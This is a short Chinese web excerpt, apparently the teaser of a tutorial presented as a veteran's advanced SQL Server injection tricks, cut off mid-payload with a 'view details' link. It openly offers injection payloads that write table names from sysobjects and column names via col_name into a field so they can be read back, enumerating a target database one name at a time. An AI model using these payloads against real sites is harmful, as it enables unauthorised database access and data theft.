现在将老兵本人多年的SQLSERVER注入高级技巧奉献给支持老兵的朋友: 前言:即是高级技巧,其它基本的注入方法就不详述了。看不懂可查本站的注入基础文章。为了更好的用好注入,建议大家看看本站的SQL语法相关文章 [获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条件] [获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]update 表名 set 字段=(select top 1 col_name(...
查看详细内容 >>